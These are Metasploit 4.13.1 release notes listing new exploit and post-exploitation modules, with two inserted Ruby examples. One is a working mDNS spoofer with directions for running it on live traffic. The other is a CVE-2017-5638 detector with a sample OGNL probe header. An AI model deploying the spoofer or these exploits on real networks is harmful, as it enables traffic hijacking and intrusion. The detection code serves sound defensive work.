• 4.13.1 Product Update 2017-03-23
    • Bugs Fixed

      • PR 7967 - The HW Bridge now displays human-readable info/details for Diagnostic Trouble Codes that are being reported by a vehicle.
      • PR 8019 - The post/multi/gather/firefox_creds module now runs correctly on Kali Linux and handles directory paths that contain spaces.
      • PR 8036 - Improvements were made to the run_as_psh module, which runs an executable on a Windows machine as another user, for example with domain credentials rather than local credentials.
      • PR 8038 - The com.metasploit.meterpreter.AndroidMeterpreter string has been removed from Payload.java because it was being flagged by AV on staged payloads.
      • PR 8056 - The Powershell mixin is now compatible with Python and Windows Meterpreter sessions, which allows modules like post/windows/gather/outlook to work properly.
      • PR 8070 - Some modules now pass query-string parameters through the `vars_get` option of `send_request_cgi`, as `msftidy` recommends.
      • PR 8095 - The command stager in `exploit/windows/ssh/freesshd_authbypass` has been fixed so that it can find the VBS decoder that was moved to the `rex-exploitation` gem.
      • PR 8100 - Fixes and improvements were made to `msfcrawler`.
      • PR 8110 - This fix resolves an issue that prevented Meterpreter from migrating into a process specified by name, rather than by PID, on Windows systems.
      • PR 8116 - The telnet_version scanner now handles a TCP reset more gracefully while scanning hosts.
      • PR 8118 - The rails_secret_deserialization module has been updated to support dash '-' characters in the secret cookie.
      • PR 8119 - The rails_secret_deserialization module has been updated to support period '.' characters in the secret cookie.
      • PR 8128 - This fix resolves an error that occurs when canon_iradv_pwd_extract receives an unexpected response from the target host.
      • PR 8135 - Host names are now validated. If the host name is empty, it is set to the IP address.
      • PR 8141 - This fix resolves an issue that caused the `kill` command in Meterpreter to not work as expected.

      • Enhancements and Features

      • PR 7835 - A new Windows local privilege escalation exploit template has been added to the framework. It can be opened in Visual Studio to build a new exploit that works inside Metasploit Framework, and is meant to give exploit developers a reference to follow when they write new exploits.
      • PR 7877 - The mDNS Spoofer module has been added to the framework. It listens for mDNS multicast queries on 5353/UDP for A and AAAA records and answers with a spoofed IP address when the queried name matches the configured regex. Affected devices include, but are not limited to, Apple products, Xbox 360s, routers and printers.
      • PR 7935 - This patch allows the Hardware Bridge to interact with RF transceiver devices supported by rfcat. Two modules (transmitter and rfpwnon), ported from the RfCatHelpers scripts, are included with this patch.
      • PR 7949 - Documentation has been added for the `auxiliary/scanner/nfs/nfsmount` and `auxiliary/scanner/snmp/snmp_login` modules.
      • PR 8037 - Several fixes and improvements were made to priv_migrate, for example not migrating when the session is already running as SYSTEM and not downgrading a privileged session.
      • PR 8058 - The Windows Meterpreter reverse_http/s stagers now have a configurable delay between connection attempts when the listener is unavailable; the default is 5 seconds. The stagers can also be configured to retry indefinitely rather than a fixed number of times.
      • PR 8065 - The Metasploit HW Bridge can now scan for and locate nearby ZigBee wireless networks.
      • PR 8071 - Msfconsole can now send text messages that include malicious attachments.
      • PR 8077 - The `srvport` method has been added to `HttpServer`, which allows you to override the displayed `SRVPORT` with the `URIPORT` option.
      • PR 8078 - You can now specify a default resource for `HttpServer` through the use of a parameter to the `start_service` method.
      • PR 8079 - An unauthenticated command execution exploit for dnaLims has been added, along with a directory traversal auxiliary module.
      • PR 8084 - You can now run the reload and recheck commands together.
      • PR 8088 - The enum_protection gather module for Linux can now report whether the `getenforce` (SELinux), `aa-status` (AppArmor), or `gradm2` (grsecurity) executables are installed on the target.
      • PR 8104 - Visual improvements were made to the Unicode tree produced by the WMAP plugin's `wmap_sites -s` command.
      • PR 8108 - The `-l` option has been added to the `load` command. You can use this option to list available plugins.
      • PR 8117 - The `pgrep` and `pkill` commands have been added to Meterpreter, allowing you to search for processes by name and kill them by name. Previously, you had to find a process with `ps` and `kill` it by PID.
      • PR 8130 - Documentation for the `winrm_script_exec` module has been added.
      • PR 8132 - Python 3 support has been added for the web_delivery module.
      • PR 8138 - This fix resolves an issue that caused the post/linux/gather/enum_system module to crash the Mettle payload. It also adds initial http/https transport support.
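The mDNS Spoofer item (PR 7877) above describes the exchange: a query for an A or AAAA record arrives on 5353/UDP, the name is matched against a regex, and a spoofed answer is sent back. The following is an added example of that core logic, written for this page and not the module's own code. It parses a query, filters on the name, and builds the response record; the constructed sample query, the regex and the spoofed addresses (10.0.0.5 and fd00::5) are assumptions, as are all the names (MdnsSpoofer, parse_query, build_response, respond, sample_query).

```ruby
require 'ipaddr'

# Added example (not the Metasploit mDNS Spoofer module): the core of an mDNS
# spoofer. Names, sample packet and addresses are constructed for illustration.
module MdnsSpoofer
  module_function

  TYPE_A    = 1
  TYPE_AAAA = 28

  # Parse the question section of a DNS/mDNS query into [{name:, type:}, ...].
  def parse_query(pkt)
    pkt = pkt.b
    raise ArgumentError, 'packet too short' if pkt.bytesize < 12
    _id, flags, qdcount = pkt.unpack('nnn')
    return [] if (flags & 0x8000) != 0          # QR bit set: a response, not a query
    off = 12
    questions = []
    qdcount.times do
      labels = []
      loop do
        len = pkt.getbyte(off)
        raise ArgumentError, 'truncated name' if len.nil?
        off += 1
        break if len.zero?
        # Queries carry plain labels; refuse compression pointers rather than chase them.
        raise ArgumentError, 'unexpected compression pointer' if len >= 0xC0
        label = pkt.byteslice(off, len)
        raise ArgumentError, 'truncated label' if label.nil? || label.bytesize < len
        labels << label
        off += len
      end
      fixed = pkt.byteslice(off, 4)
      raise ArgumentError, 'truncated question' if fixed.nil? || fixed.bytesize < 4
      qtype, _qclass = fixed.unpack('nn')      # qclass may carry the unicast-response bit
      off += 4
      questions << { name: labels.join('.'), type: qtype }
    end
    questions
  end

  # Wire-encode a dotted name as length-prefixed labels ending in a zero byte.
  def encode_name(name)
    name.split('.').map { |l| [l.bytesize, l].pack('Ca*') }.join + "\x00".b
  end

  # Build one spoofed answer: ID 0, QR|AA flags, no question section, a single
  # RR with the cache-flush bit (0x8000) set in the class field.
  # Returns nil when the name does not match or the type is not A/AAAA.
  def build_response(question, regex, spoof_v4, spoof_v6, ttl: 120)
    return nil unless regex.match?(question[:name])
    rdata = case question[:type]
            when TYPE_A    then IPAddr.new(spoof_v4).hton
            when TYPE_AAAA then IPAddr.new(spoof_v6).hton
            else return nil
            end
    header = [0, 0x8400, 0, 1, 0, 0].pack('n6')
    rr = encode_name(question[:name]) +
         [question[:type], 0x8001, ttl, rdata.bytesize].pack('nnNn') +
         rdata
    header + rr
  end

  # Turn one received query datagram into the list of responses to send back.
  def respond(pkt, regex, spoof_v4, spoof_v6)
    parse_query(pkt).map { |q| build_response(q, regex, spoof_v4, spoof_v6) }.compact
  end

  # Constructed sample: a query for printer.local, type A, class IN with the
  # unicast-response bit set, as a host would multicast it to 224.0.0.251:5353.
  def sample_query
    [0, 0, 1, 0, 0, 0].pack('n6') + encode_name('printer.local') + [TYPE_A, 0x8001].pack('nn')
  end
end

if $PROGRAM_NAME == __FILE__
  MdnsSpoofer.respond(MdnsSpoofer.sample_query, /\.local\z/, '10.0.0.5', 'fd00::5').each do |r|
    puts r.unpack1('H*')
  end
end
```

To run this against real traffic you would bind a UDPSocket to port 5353, join the 224.0.0.251 group, and pass each received datagram to `respond`, sending every returned packet back to the group. The regex is the only thing that keeps the spoofer from answering every name on the segment, so scope it to the host names you are authorised to hijack.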

      • New Exploits

      • PR 7781 - The IBM WebSphere RCE Java Deserialization Vulnerability exploit has been added to the framework. It exploits a Java deserialization vulnerability (CVE-2015-7450) in IBM's WebSphere Application Server.
      • PR 7956 - The QNAP NAS/NVR Administrator Hash Disclosure exploit has been added to the framework. It exploits combined heap and stack buffer overflows for QNAP NAS and NVR devices to dump the admin (root) shadow hash from memory.
      • PR 8076 - The easy_file_sharing_ftp module has been added to the framework. It performs a directory traversal attack against a vulnerable Easy File Sharing FTP Server and allows you to steal files outside the FTP directory.
      • PR 8086 - The Logsign Remote Command Injection module has been added to the framework. It provides remote exploitation for a command injection vulnerability in Logsign.
      • PR 8103 - An exploit for CVE-2017-5638 has been added to the framework. It targets a vulnerability in the Jakarta Multipart parser of Apache Struts 2 that lets an attacker inject an OGNL expression via the HTTP Content-Type header, resulting in arbitrary remote code execution.
      • PR 8113 - A buffer overflow exploit for SysGauge 1.5.18 has been added to the framework.
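The CVE-2017-5638 item (PR 8103) above is also the one most defenders will want to detect. The following is an added example, not the Metasploit module's code, of the check a web log or WAF rule needs: OGNL expressions are delimited by `%{ }` or `${ }`, and no legitimate media type contains either sequence, so a Content-Type header carrying one is an attack indicator. The module name (StrutsS2045Check), its methods and the sample request heads are constructed for this page; the malicious sample shows only the expression opener, not a working payload.

```ruby
# Added example (not Metasploit's exploit module): detection of the
# CVE-2017-5638 indicator in raw HTTP request heads. Names and sample
# traffic are constructed for illustration.
module StrutsS2045Check
  module_function

  # Opener of an OGNL expression; never present in a valid media type.
  OGNL_MARKER = /[%$]\{/

  # Extract the Content-Type value from a raw request head (CRLF or LF
  # separated header lines); nil when the header is absent.
  def content_type_of(request_head)
    request_head.each_line.drop(1).each do |line|   # skip the request line
      name, sep, value = line.partition(':')
      next if sep.empty?
      return value.strip if name.strip.casecmp?('content-type')
    end
    nil
  end

  # True when the header value opens an OGNL expression.
  def suspicious?(content_type)
    !content_type.nil? && OGNL_MARKER.match?(content_type)
  end

  # Indexes of the request heads that should raise an alert.
  def scan(request_heads)
    request_heads.each_index.select { |i| suspicious?(content_type_of(request_heads[i])) }
  end

  # Constructed sample traffic: three ordinary requests and one probe whose
  # Content-Type opens an OGNL expression (payload body elided).
  SAMPLE_REQUESTS = [
    "POST /upload.action HTTP/1.1\r\nHost: app.example\r\nContent-Type: multipart/form-data; boundary=----Boundary7MA4YWxk\r\n\r\n",
    "POST /login.action HTTP/1.1\r\nHost: app.example\r\nContent-Type: application/x-www-form-urlencoded\r\n\r\n",
    "GET /index.action HTTP/1.1\r\nHost: app.example\r\n\r\n",
    "POST /upload.action HTTP/1.1\r\nHost: app.example\r\nContent-Type: %{(#_='multipart/form-data').(#probe=1)}\r\n\r\n",
  ].freeze
end

if $PROGRAM_NAME == __FILE__
  StrutsS2045Check.scan(StrutsS2045Check::SAMPLE_REQUESTS).each do |i|
    puts "request #{i}: suspicious Content-Type #{StrutsS2045Check.content_type_of(StrutsS2045Check::SAMPLE_REQUESTS[i])}"
  end
end
```

Apply the check to the raw header before any decoding: `%{` is not a valid percent-escape, so a decoder may mangle or drop the marker. The same test applied to the `filename` parameter of Content-Disposition covers the related S2-046 variant of this bug, which uses the same OGNL injection through a different multipart header.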